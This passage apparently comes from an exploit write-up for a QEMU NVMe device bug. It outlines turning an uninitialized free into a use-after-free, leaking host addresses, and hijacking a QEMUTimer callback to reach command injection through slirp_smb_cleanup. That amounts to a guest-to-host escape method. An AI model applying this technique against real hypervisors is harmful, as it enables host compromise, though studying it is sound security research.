The function jumps to the **unmap** label when handling errors, and the program then directly calls **qemu_sglist_destroy()** without considering how the memory was mapped, resulting in an uninitialized free. 32 | 33 | ### 0x02 Turn arbitrary free to UAF 34 | 35 | There are two kinds of memory space in Qemu's process, Qemu's heap and the physmap heap. 36 | 37 | 1. Heap spray to clear the tcache freelist 38 | 2. Malloc a mapping table, filled with physmap addresses 39 | 3. Free the mapping table, putting it at the head of the tcache freelist 40 | 41 | 4. Malloc a **NvmeRequest** structure and trigger the vulnerability; the chunk in userspace will then be added into Qemu's tcache freelist 42 | 5. Now the chunk in userspace appears to be freed on the host, but Qemu's guest still has R/W capability. 43 | 44 | ### 0x03 Find an information leak 45 | 46 | 1. Malloc a mapping table again; the allocated chunk will be shared between host and guest 47 | 48 | 2. Initialize the table, then we get the physmap address 49 | 3. Heap fengshui again, create a new **sq** and place a **QEMUTimer** in userspace 50 | 4. Initialize the timer, then we get the Qemu address and Heap address 51 | 52 | ### 0x04 Hijack the control flow 53 | 54 | 1. Modify the cb to the system address 55 | 2. Modify the opaque to our arguments address. 56 | 3. Run the timer, Control RIP! 57 | 58 | 59 | ### Tips 60 | 61 | Note that executing the system function directly will cause QEMU to fork a new process, resulting in the removal of the mapping space of guest memory. Therefore, we can consider copying the commands of guest space to the QEMU main process, and controlling RIP to the slirp_smb_cleanup function. Then the command is copied to the RDI register, followed by a command injection to complete the command execution. 62 | 63 | ```c 64 | static void slirp_smb_cleanup(SlirpState *s) 65 | { 66 | int ret; 67 | 68 | if (s->smb_dir) { 69 | gchar *cmd = g_strdup_printf("rm -rf %s", s->smb_dir); // Control RIP to here. 
70 | ret = system(cmd); 71 | if (ret == -1 || !WIFEXITED(ret)) { 72 | error_report("'%s' failed.", cmd); 73 | } else if (WEXITSTATUS(ret)) { 74 | error_report("'%s' failed. Error code: %d", 75 | cmd, WEXITSTATUS(ret)); 76 | } 77 | g_free(cmd); 78 | g_free(s->smb_dir); 79 | s->smb_dir = NULL; 80 | } 81 | } 82 | ``` 83 | --------------------------------------------------------------------------------